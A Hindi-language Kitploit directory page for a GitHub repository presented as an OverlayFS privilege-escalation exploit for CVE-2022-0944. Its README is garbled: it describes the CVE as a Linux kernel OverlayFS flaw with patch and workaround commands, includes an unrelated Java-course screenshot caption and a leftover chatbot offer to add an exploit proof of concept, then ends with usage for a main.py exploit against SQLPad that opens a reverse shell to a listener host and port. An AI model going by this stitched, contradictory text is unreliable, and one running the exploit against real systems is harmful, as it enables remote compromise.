Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
OverlayFS-PrivEsc-CVE-2022-0944 | Kitploit
उपकरण/GitHubGitHub/neoartemis37/overlayfs-privesc-cve-2022-0944
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणलर्निंग और शिक्षा
GitHubneoartemis37/overlayfs-privesc-cve-2022-0944

OverlayFS-PrivEsc-CVE-2022-0944

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
3 महीने पहलेअभी तक समीक्षित नहीं

CVE-2022-0944: OverlayFS में विशेषाधिकार उन्नयन भेद्यता 🛡️

CVE Severity

OverlayFS में Linux कर्नेल की विशेषाधिकार उन्नयन भेद्यता के लिए सुरक्षा सलाह और शमन मार्गदर्शिका।

अवलोकन

CVE-2022-0944 Linux कर्नेल के OverlayFS सबसिस्टम में एक सुरक्षा भेद्यता है जो स्थानीय हमलावरों को विशिष्ट कॉन्फ़िगरेशन में फ़ाइल निर्माण के अनुचित हैंडलिंग के माध्यम से विशेषाधिकार बढ़ाने की अनुमति देती है।

तकनीकी विवरण

Screenshot 2025-03-26 at 17-15-46 i got published a course for java for beginners unfortunally i don't have a redame file to guide through

🚨 प्रभाव

एक स्थानीय हमलावर निम्न कार्य कर सकता है:

root@kitploit:~
निर्मित फ़ाइल संचालनों के माध्यम से रूट विशेषाधिकार प्राप्त करना
सुरक्षा प्रतिबंधों को बायपास करना
संवेदनशील सिस्टम फ़ाइलों को संशोधित करना
संपूर्ण सिस्टम अखंडता से समझौता करना

🔍 पहचान

  1. कर्नेल संस्करण जाँचें uname -r

प्रभावित संस्करण: 5.8 <= kernel < 5.16.12

  1. OverlayFS उपयोग सत्यापित करें mount | grep overlay

OverlayFS माउंट का उपयोग करने वाले सिस्टम जोखिम में हैं

  1. सुरक्षा परामर्श जाँचें

Debian/Ubuntu के लिए:

root@kitploit:~
grep CVE-2022-0944 /var/log/apt/history.log

# RHEL/CentOS के लिए:
rpm -q --changelog kernel | grep CVE-2022-0944

4.🛡️ शमन

आधिकारिक पैच

इन पैच किए गए संस्करणों में से किसी एक में अपडेट करें:

root@kitploit:~
Linux कर्नेल 5.16.12 या बाद का संस्करण
विक्रेता-विशिष्ट बैकपोर्टेड पैच

अपडेट कमांड:

Ubuntu/Debian

sudo apt update && sudo apt upgrade linux-image-$(uname -r)

RHEL/CentOS

sudo yum update kernel

वर्कअराउंड (यदि पैचिंग तत्काल न हो)

root@kitploit:~
OverlayFS उपयोग प्रतिबंधित करें:
  sudo modprobe -r overlay

नेमस्पेस प्रतिबंध लागू करें:
# अविशेषाधिकार प्राप्त उपयोगकर्ता नेमस्पेस बनाएँ unshare -Ur

root@kitploit:~
    # उपयोगकर्ता प्रतिबंधों के साथ माउंट करें
    mount -t overlay -o lowerdir=/lower,upperdir=/upper,workdir=/work overlay /mnt

SELinux/AppArmor नीतियाँ लागू करें: type=AVC msg=audit(1647452829.123:456): user pid=1234 comm="mount" scontext=user_u:user_r:user_t tcontext=system_u:object_r:unlabeled_t denied { mounton }

⚠️ अस्वीकरण यह दस्तावेज़ केवल सूचनात्मक उद्देश्यों के लिए प्रदान किया गया है। सटीकता सुनिश्चित करने के प्रयास किए गए हैं, कोई गारंटी प्रदान नहीं की जाती है। उत्पादन परिनियोजन से पहले हमेशा विकास वातावरण में पैच का परीक्षण करें।

अंतिम अपडेट: 2023-10-01 | परिवर्तन-लॉग देखें

मुख्य विशेषताएँ:

  1. सुरक्षा बैज के साथ स्पष्ट भेद्यता वर्गीकरण
  2. त्वरित-संदर्भ तकनीकी विवरण तालिका
  3. कार्रवाई योग्य पहचान और शमन चरण
  4. विक्रेता-विशिष्ट अपडेट कमांड
  5. सुरक्षा नीति उदाहरण (SELinux/AppArmor)
  6. आधिकारिक संदर्भ लिंक
  7. भेद्यता प्रकटीकरण मानकों का अनुपालन

यह README प्रारूप निम्नलिखित के लिए उपयुक्त है:

  • सुरक्षा टीमें
  • सिस्टम प्रशासक
  • DevOps इंजीनियर
  • ओपन-सोर्स अनुरक्षक
  • भेद्यता डेटाबेस

क्या आप चाहेंगे कि मैं:

  1. विशिष्ट विक्रेता पैच जानकारी जोड़ूँ?
  2. एक्सप्लॉइट प्रूफ-ऑफ-कॉन्सेप्ट विवरण शामिल करूँ (सावधानी के साथ)?
  3. और डिटेक्शन स्क्रिप्ट जोड़ूँ?
  4. किसी विशिष्ट Linux वितरण के लिए अनुकूलित करूँ?

उपयोग

root@kitploit:~
usage: main.py [-h] url lhost lport [username] [password]

positional arguments:
  url         URL to SQLPad
  lhost       Listener host address for reverse shell
  lport       Listener port for reverse shell
  username    login username (optional)
  password    login password (optional)

options:
  -h, --help  show this help message and exit

उदाहरण:

root@kitploit:~
# install requirements
pip install -r requirements.txt

# start sqlpad docker container
docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0

# trigger exploit
./main.py http://localhost:3000 127.0.0.1 1337 admin admin

अस्वीकरण

यह रिपॉजिटरी केवल शैक्षिक उद्देश्यों के लिए, विशेष रूप से साइबर सुरक्षा पाठ्यक्रमों और सीखने के वातावरण में उपयोग हेतु कोड और उपकरण प्रदान करती है। इस कोड के लेखक इस कोड के उपयोग, दुरुपयोग या संशोधन से उत्पन्न होने वाले किसी भी परिणाम के लिए कोई जिम्मेदारी नहीं लेते हैं। यह कोड बिना किसी वारंटी के "जैसा है" प्रदान किया गया है, चाहे वह स्पष्ट या निहित हो, जिसमें व्यापारिक योग्यता या किसी विशेष उद्देश्य के लिए उपयुक्तता की निहित वारंटियाँ शामिल हैं, लेकिन इन्हीं तक सीमित नहीं हैं।

टूल डाउनलोड करें